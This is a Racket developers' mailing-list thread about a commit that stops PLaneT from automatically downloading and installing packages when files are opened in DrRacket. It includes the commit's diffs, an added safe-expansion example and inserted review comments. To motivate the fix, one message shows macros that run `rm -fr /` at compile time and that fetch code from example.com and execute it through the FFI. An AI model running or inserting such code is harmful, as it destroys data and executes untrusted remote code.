[racket-dev] [plt] Push #27862: master branch updated

From: Jay McCarthy (jay at racket-lang.org)
Date: Wed Nov 27 20:21:49 EST 2013

If I have background expansion on, then when I open that file it
installs the package.

Since once a Planet package is installed it is set up and compiled,
that means that this code:

#lang racket
(attack)
(define-syntax (attack stx)
 (system "rm -fr /"))

is automatically run as soon as I open it up.

Furthermore, I could do something like this:

#lang racket
(attack)
(define-syntax (attack stx)
 (local-require (only-in '#%foreign ffi-call _int32)
         net/http-client)

(define-values (s hs ip)
  (http-sendrecv "example.com" "/"))
(define bs (port->bytes ip))
(printf "got: ~v\n" bs)
(define weird-c-code bs)

((ffi-call weird-c-code null _int32)))

and really execute any C code that I could find on the Internet.

This isn't just a DrRacket problem though. We should not be
arbitrarily installing things on people's machines without their
consent. This power is too much.

The new system of suggesting an install or allowing an opt-in for
certain vetted packages is much kinder.

Jay
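
The mechanism the patch below relies on, as an added example that is not code from this thread or from the Racket project: expansion is run with the PLaneT resolver's `download?` and `install?` parameters forced to `#f` (the defaults the commit flips), so a `(require (planet ...))` that would need a fetch raises `exn:fail:planet` instead of installing anything. It assumes `planet/resolver` exports those two parameters; `exn:fail:planet` is in the provide list visible in the patch.

```racket
#lang racket/base
;; Added example; not code from the thread or from the Racket project.
;; It expands a module source with PLaneT downloading and installing
;; refused, which is what the patch's new defaults (download? = #f,
;; install? = #f) make the resolver do, and reports the refusal
;; instead of fetching and compiling third-party code.
;; Assumption: planet/resolver exports the download? and install?
;; parameters; exn:fail:planet is visible in the patch's provide list.
(require planet/resolver)

;; Expand a `#lang` module given as a string. Returns 'ok, or
;; 'needs-planet-package when expansion would have had to download
;; or install a PLaneT package.
(define (expand-without-installing src-string)
  (define in (open-input-string src-string))
  (port-count-lines! in)
  (define stx
    (parameterize ([read-accept-reader #t])     ; accept the #lang line
      (read-syntax 'untrusted in)))
  ;; Fresh namespace for the expansion, but share this module's instance
  ;; of planet/resolver with it so the parameterize below reaches the
  ;; resolver that the (planet ...) require will actually call.
  (define ns (make-base-namespace))
  (namespace-attach-module (current-namespace) 'planet/resolver ns)
  (parameterize ([download? #f]                ; refuse network fetches
                 [install? #f]                 ; refuse installs
                 [current-namespace ns])
    (with-handlers ([exn:fail:planet?
                     (lambda (e)
                       (eprintf "refused: ~a\n" (exn-message e))
                       'needs-planet-package)])
      (expand stx)
      'ok)))

;; Constructed sample input: a module that requires a PLaneT package.
;; The package name is a placeholder; nothing is fetched.
(define sample
  "#lang racket/base\n(require (planet example/placeholder-pkg:1:0))\n")

(module+ main
  (printf "~a\n" (expand-without-installing sample)))
```

Refusing installs only stops third-party code from being fetched; macros defined in the file itself still run during `expand`, which is exactly what the first snippet in the message shows, so untrusted input should only ever be expanded inside a sandbox.
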




On Wed, Nov 27, 2013 at 5:35 PM, Robby Findler
<robby at eecs.northwestern.edu> wrote:
> Can you demonstrate how to make this happen? Opening a file with these
> contents, for example, doesn't install anything.
>
> #lang racket
> (require (planet planet/test-connection:1:0/test-connection))
>
> As for automatically executing arbitrary code, I think you must mean
> something more precise here. Perhaps "code that hasn't already been
> explicitly installed"? If that's what you mean, then I think I'm also
> missing how this happens.
>
> Robby
>
>
> On Wed, Nov 27, 2013 at 4:42 PM, Jay McCarthy <jay at racket-lang.org> wrote:
>>
>> There is an important change in this commit. Since we've created the
>> release branch for 6.0, I think we should stop automatically
>> installing and executing arbitrary code when people open files in
>> DrRacket. Currently the error message suggests using "raco planet" but
>> I think we need a bit of a GUI shim for other users.
>>
>> On Wed, Nov 27, 2013 at 3:40 PM,  <jay at racket-lang.org> wrote:
>> > jay has updated `master' from 033065f632 to 60ae164d05.
>> >   http://git.racket-lang.org/plt/033065f632..60ae164d05
>> >
>> > =====[ 6 Commits ]======================================================
>> > Directory summary:
>> >   57.6% pkgs/plt-services/meta/pkg-index/official/static/
>> >   17.6% pkgs/plt-services/meta/pkg-index/official/
>> >   22.0% racket/collects/planet/private/
>> >
>> > ~~~~~~~~~~
>> >
>> > 2413278 Jay McCarthy <jay at racket-lang.org> 2013-11-27 14:51
>> > :
>> > | moving delete button
>> > :
>> >   M .../meta/pkg-index/official/static/index.html         |  2 ++
>> >   M .../meta/pkg-index/official/static/index.js           | 16
>> > +++++++++-------
>> >   M .../meta/pkg-index/official/static/style.css          |  4 ++++
>> >
>> > ~~~~~~~~~~
>> >
>> > 113696c Jay McCarthy <jay at racket-lang.org> 2013-11-27 14:54
>> > :
>> > | edit on lose focus
>> > :
>> >   M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++-
>> >
>> > ~~~~~~~~~~
>> >
>> > cf1755f Jay McCarthy <jay at racket-lang.org> 2013-11-27 15:19
>> > :
>> > | Remove arbitrary code execution exploit from Racket and DrRacket
>> > |
>> > | This is particularly bad with DrRacket's online syntax checking, which
>> > | causes opening a file to download and execute arbitrary code.
>> > :
>> >   M racket/collects/planet/private/resolver.rkt | 8 ++++----
>> >
>> > ~~~~~~~~~~
>> >
>> > 98df30c Jay McCarthy <jay at racket-lang.org> 2013-11-27 15:30
>> > :
>> > | deleting static s3 content properly
>> > :
>> >   M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11
>> > ++++++++++-
>> >
>> > ~~~~~~~~~~
>> >
>> > 7b7a5ad Jay McCarthy <jay at racket-lang.org> 2013-11-27 15:33
>> > :
>> > | increase pkg test timeout
>> > :
>> >   M pkgs/plt-services/meta/props | 2 +-
>> >
>> > ~~~~~~~~~~
>> >
>> > 60ae164 Jay McCarthy <jay at racket-lang.org> 2013-11-27 15:39
>> > :
>> > | Removing add tag button when not logged in re mflatt
>> > :
>> >   M pkgs/plt-services/meta/pkg-index/official/static/index.js  | 11
>> > +++++++++--
>> >   M .../plt-services/meta/pkg-index/official/static/index.html |  2 +-
>> >
>> > =====[ Overall Diff ]===================================================
>> >
>> > pkgs/plt-services/meta/pkg-index/official/static.rkt
>> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt
>> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt
>> > @@ -304,7 +304,16 @@
>> >    (cache "/pkgs" "pkgs")
>> >    (cache "/pkgs-all" "pkgs-all")
>> >    (for ([p (in-list pkg-list)])
>> > -    (cache (format "/pkg/~a" p) (format "pkg/~a" p))))
>> > +    (cache (format "/pkg/~a" p) (format "pkg/~a" p)))
>> > +
>> > +  (let ()
>> > +    (define pkg-path (build-path static-path "pkg"))
>> > +    (for ([f (in-list (directory-list pkg-path))]
>> > +          #:unless (regexp-match #"json$" (path->string f))
>> > +          #:unless (member (path->string f) pkg-list))
>> > +      (with-handlers ([exn:fail:filesystem? void])
>> > +        (delete-file (build-path pkg-path f))
>> > +        (delete-file (build-path pkg-path (path-add-suffix f
>> > #".json")))))))
>> >
>> >  (module+ main
>> >    (require racket/cmdline)
>> >
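Review bot: in the added cleanup loop, `#:unless (regexp-match #"json$" (path->string f))` skips any name that merely ends in `json`, not only a `.json` suffix, and both `delete-file` calls sit under a single `(with-handlers ([exn:fail:filesystem? void]) ...)`, so when the first delete fails the matching `.json` is never attempted and an orphan sidecar is left behind; use `#rx"\\.json$"` and give each delete its own handler. The commit message ("deleting static s3 content properly") should also say that only entries absent from `pkg-list` are removed, since that membership test is the only thing keeping a live package's files from being deleted.
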
>> > pkgs/plt-services/meta/pkg-index/official/static/index.html
>> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.html
>> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.html
>> > @@ -54,12 +54,14 @@
>> >          <tr><td>Last Edit:</td><td><span
>> > id="pi_last_edit"></span></td></tr>
>> >          <tr><td>Description:</td><td><span
>> > id="pi_description"></span></td></tr>
>> >          <tr><td>Tags:</td><td><span id="pi_tags"></span></td></tr>
>> > -        <tr><td></td><td><input type="text" id="pi_add_tag_text"
>> > class="text ui-widget-content ui-corner-all" /><button
>> > id="pi_add_tag_button">Add Tag</button></td></tr>
>> > +        <tr id="pi_add_tag_row"><td></td><td><input type="text"
>> > id="pi_add_tag_text" class="text ui-widget-content ui-corner-all" /><button
>> > id="pi_add_tag_button">Add Tag</button></td></tr>
>> >          <tr id="pi_versions_row"><td>Versions Exceptions</td><td><table
>> > id="pi_versions"></table></td></tr>
>> >          <tr
>> > id="pi_add_version_row"><td></td><td><label>Version:</label> <input
>> > type="text" id="pi_add_version_text" class="text ui-widget-content
>> > ui-corner-all" /><br /><label>Source:</label> <input type="text"
>> > id="pi_add_version_source_text" class="text ui-widget-content ui-corner-all"
>> > /><button id="pi_add_version_button">Add Version
>> > Exception</button></td></tr>
>> >          <tr id="pi_dependencies_row"><td>Dependencies</td><td><span
>> > id="pi_dependencies"></span></td></tr>
>> >          <tr id="pi_conflicts_row"><td>Conflicts</td><td><span
>> > id="pi_conflicts"></span></td></tr>
>> >          <tr><td>Modules</td><td><span id="pi_modules"></span></td></tr>
>> > +        <tr id="pi_delete_row"><td colspan="2"><button
>> > id="pi_delete_button">Delete
>> > +        Package</button><br />(there is no undo!)</td></tr>
>> >        </table>
>> >
>> >        <div id="pi_install" class="install">Install this package
>> > with:<br><br><tt>raco pkg install <span
>> > id="pi_name_inst"></span></tt><br><br>or, with the 'File|Install Package...'
>> > menu option in DrRacket.</div>
>> >
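Review bot: the new `<tr id="pi_delete_row">` ships its own `(there is no undo!)` warning but nothing in the markup asks for confirmation before the irreversible action; the delete button should be wrapped in a confirm step. The row is also always present in the static page and only hidden by script for non-owners, so hiding it must not be what restricts deletion to package owners.
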
>> > pkgs/plt-services/meta/pkg-index/official/static/index.js
>> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.js
>> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.js
>> > @@ -8,6 +8,8 @@ function me () {
>> >      return localStorage['email']; }
>> >
>> >  $( document ).ready(function() {
>> > +    var logged_in = false;
>> > +
>> >      function jslink ( texts, clickf) {
>> >          return $('<a>', { href: "javascript:void(0)",
>> >                            click: clickf } ).html(texts); }
>> > @@ -43,7 +45,7 @@ $( document ).ready(function() {
>> >          update_package_on_list ( pkgi );
>> >          // console.log( pkgi );
>> >          change_hash( "[" + pkgi['name'] + "]" );
>> > -
>> > +
>> >          var mypkg_p = ($.inArray(me(), pkgi['authors'] ) != -1);
>> >
>> >          function make_editbutton ( spot, initv, fun ) {
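Review bot: this hunk removes a blank line and adds a blank line, so it is a whitespace-only change (trailing spaces) and should be dropped from the diff to keep the history readable.
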
>> > @@ -56,17 +58,20 @@ $( document ).ready(function() {
>> >                                              var it = $( "#" + spot +
>> > "_text" );
>> >                                              it.keypress( function (e) {
>> >                                                  if (e.which == 13) {
>> > fun (it.val()); } } );
>> > +                                            it.focusout( function (e) {
>> > +                                                fun (it.val()); } );
>> >                                              it.val(initv).focus(); } )
>> > ); } }
>> >
>> >          $( "#pi_name" ).text( pkgi['name'] );
>> >          make_editbutton ( "pi_name", pkgi['name'], submit_mod_name );
>> >          if ( mypkg_p ) {
>> > -            $( "#pi_name" ).append( $('<button>')
>> > -                                    .button({ icons: { primary:
>> > "ui-icon-trash" } })
>> > -                                    .click( function (e) {
>> > -                                        dynamic_pkgsend(
>> > "/jsonp/package/del", { } );
>> > -                                        $(pkgi['dom_obj']).remove();
>> > -
>> > $("#package_info").dialog("close"); } ) ); }
>> > +            $( "#pi_delete_button" ).click( function (e) {
>> > +                dynamic_pkgsend( "/jsonp/package/del", { } );
>> > +                $(pkgi['dom_obj']).remove();
>> > +                $("#package_info").dialog("close"); } );
>> > +            $( "#pi_delete_row" ).show(); }
>> > +        else {
>> > +            $( "#pi_delete_row" ).hide(); }
>> >
>> >          $( "#pi_name_inst" ).text( pkgi['name'] );
>> >          $( "#pi_ring" ).text( pkgi['ring'] );
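Review bot: `$( "#pi_delete_button" ).click( function (e) { ... } )` is now bound inside the per-package display code on an element that persists in the page, so each package viewed stacks another click handler and one click on Delete sends `dynamic_pkgsend( "/jsonp/package/del", { } )` once per accumulated handler; the removed code sidestepped this by creating a fresh button each time. Bind once outside this function, or use `.off("click").on("click", ...)` here. Separately, the added `it.focusout( function (e) { fun (it.val()); } )` runs alongside the existing Enter-key path, so if `fun` replaces or blurs the field the same edit is submitted twice.
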
>> > @@ -104,6 +109,10 @@ $( document ).ready(function() {
>> >                           " "]; }
>> >              else {
>> >                  return [tag, " "]; } } ) ));
>> > +        if ( logged_in ) {
>> > +            $( "#pi_add_tag_row" ).show(); }
>> > +        else {
>> > +            $( "#pi_add_tag_row" ).hide(); }
>> >
>> >          $( "#pi_versions" ).html("").append( $.map(
>> > Object.keys(pkgi['versions']).sort(), function ( v, vi ) {
>> >              var vo = pkgi['versions'][v];
>> > @@ -494,8 +503,10 @@ $( document ).ready(function() {
>> >      $( "#login_code_row" ).hide();
>> >
>> >      function menu_logout () {
>> > +        logged_in = false;
>> >          $("#logout").html( jslink( "login", function () { $( "#login"
>> > ).dialog( "open" ); } ) ); }
>> >      function menu_loggedin ( curate_p ) {
>> > +        logged_in = true;
>> >          $("#logout").html("")
>> >              .append( me(),
>> >                       ( curate_p ? [ " (", jslink( "curator", function
>> > () {
>> >
>> > pkgs/plt-services/meta/pkg-index/official/static/style.css
>> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static/style.css
>> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/style.css
>> > @@ -150,3 +150,7 @@ a.possible {
>> >      text-align: center;
>> >      color: red;
>> >  }
>> > +
>> > +tr#pi_delete_row td {
>> > +    text-align: center;
>> > +}
>> >
>> > pkgs/plt-services/meta/props
>> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> > --- OLD/pkgs/plt-services/meta/props
>> > +++ NEW/pkgs/plt-services/meta/props
>> > @@ -1289,7 +1289,7 @@ path/s is either such a string or a list of them.
>> >  "pkgs/racket-pkgs/racket-test/tests/openssl/basic.rkt" drdr:random #t
>> >  "pkgs/racket-pkgs/racket-test/tests/pkg" responsible (jay)
>> > drdr:command-line (mzc *)
>> >  "pkgs/racket-pkgs/racket-test/tests/pkg/test-pkgs" drdr:command-line #f
>> > -"pkgs/racket-pkgs/racket-test/tests/pkg/test.rkt" drdr:command-line
>> > (raco "test" *) drdr:timeout 600
>> > +"pkgs/racket-pkgs/racket-test/tests/pkg/test.rkt" drdr:command-line
>> > (raco "test" *) drdr:timeout 2400
>> >  "pkgs/racket-pkgs/racket-test/tests/racket" responsible (mflatt)
>> >  "pkgs/racket-pkgs/racket-test/tests/racket/all.rktl" drdr:command-line
>> > #f
>> >  "pkgs/racket-pkgs/racket-test/tests/racket/basic.rktl"
>> > drdr:command-line #f
>> >
>> > racket/collects/planet/private/resolver.rkt
>> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> > --- OLD/racket/collects/planet/private/resolver.rkt
>> > +++ NEW/racket/collects/planet/private/resolver.rkt
>> > @@ -219,9 +219,9 @@ See the scribble documentation on the
>> > planet/resolver module.
>> >           (struct-out exn:fail:planet))
>> >
>> >  ;; if #f, will not install packages and instead raise a
>> > exn:fail:install? error
>> > -(define install? (make-parameter #t))
>> > +(define install? (make-parameter #f))
>> >  ;; if #f, will not download packages and instead raise a
>> > exn:fail:install? error
>> > -(define download? (make-parameter #t))
>> > +(define download? (make-parameter #f))
>> >  (define-struct (exn:fail:planet exn:fail) ())
>> >
>> >  ;; update doc index only once for a set of installs:
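Review bot: the comments above both parameters still say "will not install packages and instead raise a exn:fail:install? error", but the struct defined and raised here is `exn:fail:planet`; correct the comments while touching these lines. Flipping the defaults of `install?` and `download?` to `#f` is the security change of this series and alters behaviour for every caller that relied on auto-install, so it needs a documentation and release-notes entry, not only the commit message.
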
>> > @@ -541,7 +541,7 @@ See the scribble documentation on the
>> > planet/resolver module.
>> >    (unless (download?)
>> >      (raise (make-exn:fail:planet
>> >              (format
>> > -             "PLaneT error: cannot download package ~s since the
>> > download? parameter is set to #f"
>> > +             "PLaneT error: cannot download package ~s without
>> > permission. Give permission with download? parameter or use 'raco planet
>> > install'"
>> >               (list (car (pkg-spec-path pkg)) (pkg-spec-name pkg)))
>> >              (current-continuation-marks))))
>> >    ((if (USE-HTTP-DOWNLOADS?) download-package/http
>> > download-package/planet)
>> > @@ -577,7 +577,7 @@ See the scribble documentation on the
>> > planet/resolver module.
>> >    (unless (install?)
>> >      (raise (make-exn:fail:planet
>> >              (format
>> > -             "PLaneT error: cannot install package ~s since the
>> > install? parameter is set to #f"
>> > +             "PLaneT error: cannot install package ~s without
>> > permission. Give permission with download? parameter or use 'raco planet
>> > install'"
>> >               (list (car pkg-path) pkg-name maj min))
>> >              (current-continuation-marks))))
>> >    (define owner (car pkg-path))
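Review bot: the new message in the `(unless (install?) ...)` branch says "Give permission with download? parameter", copied from the download branch above; this check is on `install?`, so the message should name the `install?` parameter (and a caller may need to set both, since the download check is separate).
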
>>
>> _________________________
>>   Racket Developers list:
>>   http://lists.racket-lang.org/dev
>
>

Posted on the dev mailing list.